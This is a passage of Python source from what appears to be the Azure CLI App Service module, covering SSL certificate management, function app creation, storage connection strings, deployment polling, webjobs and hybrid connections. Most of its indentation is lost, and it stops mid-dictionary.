webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
    with open(certificate_file, 'rb') as f:
        p12 = OpenSSL.crypto.load_pkcs12(f.read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
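# Illustrative sketch (comment only): the SHA-1 thumbprint from _get_cert feeds _generate_cert_name.
# Paths, passwords and the thumbprint below are placeholders.
#
#   thumb = _get_cert('P@ssw0rd', './mycert.pfx')           # e.g. 'AB12CD34...'
#   _generate_cert_name(thumb, 'my-ase', 'westus2', 'myrg')
#   # -> 'AB12CD34..._my-ase_westus2_myrg'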
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = _format_key_vault_id(cmd.cli_ctx, key_vault, resource_group_name)
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name):
from azure.cli.command_modules.keyvault._client_factory import keyvault_client_vaults_factory
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
kv_client = keyvault_client_vaults_factory(cmd.cli_ctx, None)
vault = kv_client.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
            pass  # lookup will fail for non-service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cli_ctx, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
    # the goal is to match '*.foo.com' with host names like 'admin.foo.com', 'logs.foo.com', etc.
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
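# Illustrative sketch (comment only): wildcard names on the certificate are matched by suffix
# against the app's hostnames (sample values are hypothetical).
#
#   _match_host_names_from_cert(['*.foo.com'], ['admin.foo.com', 'logs.foo.com', 'foo.org'])
#   # -> {'admin.foo.com', 'logs.foo.com'}
#   _match_host_names_from_cert(['shop.foo.com'], ['shop.foo.com', 'admin.foo.com'])
#   # -> {'shop.foo.com'}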
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
def __init__(self, client, linux=False):
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(stack, site_config):
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
            # get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
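# Illustrative sketch (comment only): typical use of the helper above. The display name is a
# hypothetical example; real values come from the provider's get_available_stacks call.
#
#   helper = _StackRuntimeHelper(client, linux=False)
#   match = helper.resolve('node|10.14')
#   if match:
#       site_config = match['setter'](match, site_config)  # for node, sets WEBSITE_NODE_DEFAULT_VERSION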
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(plan_info):
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(plan_info):
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
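# Illustrative sketch (comment only):
#
#   validate_range_of_int_flag('--max-burst', '10', min_val=0, max_val=20)   # -> 10
#   validate_range_of_int_flag('--max-burst', '25', min_val=0, max_val=20)   # -> CLIError (out of range)
#   validate_and_convert_to_int('--max-burst', 'ten')                        # -> CLIError (not an int)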
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, runtime=None, runtime_version=None, consumption_plan_location=None,
app_insights=None, app_insights_key=None, disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements, too-many-branches
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
        # if os_type is None, the OS type defaults to Windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
if runtime:
if is_linux and runtime not in LINUX_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}."
.format(', '.join(LINUX_RUNTIMES)))
if not is_linux and runtime not in WINDOWS_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}."
.format(', '.join(WINDOWS_RUNTIMES)))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
if runtime_version is not None:
if runtime is None:
raise CLIError('Must specify --runtime to use --runtime-version')
allowed_versions = RUNTIME_TO_IMAGE_FUNCTIONAPP[runtime].keys()
if runtime_version not in allowed_versions:
raise CLIError('--runtime-version {} is not supported for the selected --runtime {}. '
'Supported versions are: {}'
.format(runtime_version, runtime, ', '.join(allowed_versions)))
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
        is_consumption = consumption_plan_location is not None
        site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
        if not is_consumption:
            site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
                                                          value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
if runtime not in RUNTIME_TO_IMAGE_FUNCTIONAPP.keys():
raise CLIError("An appropriate linux image for runtime:'{}' was not found".format(runtime))
if deployment_container_image_name is None:
site_config.linux_fx_version = _get_linux_fx_functionapp(is_consumption, runtime, runtime_version)
else:
functionapp_def.kind = 'functionapp'
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
    # add the app settings that make the site a function app
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION',
value=_get_website_node_version_functionapp(runtime,
runtime_version)))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif not disable_app_insights:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
        logger.warning("Your Linux function app '%s', which uses a consumption plan, has been successfully "
                       "created but is not active until content is published using "
                       "the Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
return functionapp
def _get_linux_fx_functionapp(is_consumption, runtime, runtime_version):
if runtime_version is None:
runtime_version = RUNTIME_TO_DEFAULT_VERSION[runtime]
if is_consumption:
return '{}|{}'.format(runtime.upper(), runtime_version)
# App service or Elastic Premium
return _format_fx_version(RUNTIME_TO_IMAGE_FUNCTIONAPP[runtime][runtime_version])
def _get_website_node_version_functionapp(runtime, runtime_version):
if runtime is None or runtime != 'node':
return NODE_VERSION_DEFAULT_FUNCTIONAPP
if runtime_version is not None:
return '~{}'.format(runtime_version)
return NODE_VERSION_DEFAULT_FUNCTIONAPP
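# Illustrative sketch (comment only): how the two helpers above shape the site configuration.
# The runtime/version pairs are hypothetical; real values come from RUNTIME_TO_IMAGE_FUNCTIONAPP,
# RUNTIME_TO_DEFAULT_VERSION and NODE_VERSION_DEFAULT_FUNCTIONAPP.
#
#   _get_linux_fx_functionapp(True, 'python', '3.7')      # consumption -> 'PYTHON|3.7'
#   _get_linux_fx_functionapp(False, 'python', '3.7')     # dedicated -> 'DOCKER|<image for python 3.7>'
#   _get_website_node_version_functionapp('node', '10')   # -> '~10'
#   _get_website_node_version_functionapp('python', None) # -> NODE_VERSION_DEFAULT_FUNCTIONAPP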
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
    # emit this success message as a warning so it does not interfere with regular JSON output on stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
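# Resolves the storage account (by name or resource id), verifies it exposes blob/queue/table
# endpoints and uses an allowed SKU, then builds a DefaultEndpointsProtocol connection string
# from its primary key.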
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
        error_message += ' Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
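# Polls the Kudu deployment status endpoint roughly every 2 seconds (hence timeout // 2 trials)
# until the deployment reports success (status 4) or failure (status 3), or the trial budget is
# exhausted.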
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log tail
-n {} -g {}""".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
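# Hybrid connection helpers: list/add/remove hybrid connections on an app and rotate the key
# used by the apps on a plan. Hybrid connections are not supported for Linux apps.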
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
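# Looks up the Relay namespace by name, ensures a 'defaultSender' authorization rule with send
# rights exists on the hybrid connection, then registers the connection (hostname, port and send
# key taken from the relay metadata) on the web app or slot.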
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
